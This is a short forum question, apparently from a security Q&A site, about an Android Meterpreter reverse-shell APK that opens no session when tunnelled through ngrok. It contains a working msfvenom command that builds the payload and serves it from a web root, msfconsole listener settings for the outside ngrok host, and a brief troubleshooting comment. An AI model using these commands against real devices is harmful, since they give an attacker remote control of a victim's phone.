# APK reverse shell using ngrok is not creating a session

Tags: metasploit, meterpreter

I am using ngrok for port forwarding (`./ngrok tcp 4242`)

I created a payload using

```
msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.in.ngrok.io LPORT=16656 R> /var/www/html/package.apk
```

then in the msfconsole I set the parameters:

```
set Payload - android/meterpreter/reverse_tcp
set LHOST 0.tcp.in.ngrok.io
set LPORT 16656
set reverselistenerbindaddress 127.0.0.1
set reverselistenerbindPort 4242
exploit
```

I am able to download using mobile network on my android phone using the ngrok ip and port.

I installed the apk file and clicked 100 times but not getting any active session in msfconsole. Where am I going wrong?

Comment: You need to start the troubleshooting process. Confirm that each step is working until you figure out what is not working. Is the phone trying to establish a connection? Is ngrok receiving it? Is ngrok's connection to your listener active?